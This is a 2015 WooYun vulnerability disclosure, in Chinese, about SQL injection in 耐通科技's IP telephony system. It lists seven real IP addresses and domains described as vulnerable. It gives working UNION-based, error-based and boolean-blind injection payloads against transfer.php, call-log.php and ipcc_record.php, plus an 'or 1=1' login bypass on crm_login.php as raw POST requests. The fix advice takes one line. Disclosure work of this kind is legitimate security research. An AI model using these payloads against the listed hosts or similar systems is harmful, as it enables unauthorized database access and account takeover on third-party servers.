当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120245

漏洞标题:耐通科技IP电话系统几处SQL注入漏洞

相关厂商:耐通科技

漏洞作者: 路人甲

提交时间:2015-06-15 17:30

修复时间:2015-07-30 17:32

公开时间:2015-07-30 17:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-07-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

耐通科技IP电话系统几处SQL注入漏洞

详细说明:

耐通科技IP电话系统几处SQL注入漏洞
案例:

http://119.6.68.126:8086/
http://cti.dkd.net.cn/
http://222.73.37.218:81/
http://211.152.38.173/
http://211.152.52.234:82/
http://116.247.83.22/
http://61.129.255.238/


漏洞详情:

1.
/transfer.php?action=getIVRFail&randomid=1434181126622&channel=1') UNION ALL SELECT CONCAT(0x3A403A,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3A403A)--%20
2.
/call-log.php?randomid=1434180084664&agent=1'||(SELECT 'abc' FROM DUAL WHERE 1=1 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3A403A,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3A403A,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a))||'
3.
/ipcc_record.php?randomid=1434181312237&agent=1') AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x3A403A,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x3A403A,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('a'='a
4.
任意用户登陆+布尔型盲注
POST /crm_login.php HTTP/1.1
agent_name=-1' or 1=1--%20&agent_pwd=20&Issoftphone=yes&submit=
POST /crm_login.php HTTP/1.1
agent_name=-1' or 1=2--%20&agent_pwd=20&Issoftphone=yes&submit=

漏洞证明:

1.

1.png


2.

2.png


3.

3.png


4.

4-1.png


4-2.png


修复方案:

对参数进行判断并过滤,限制未登陆用户访问

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)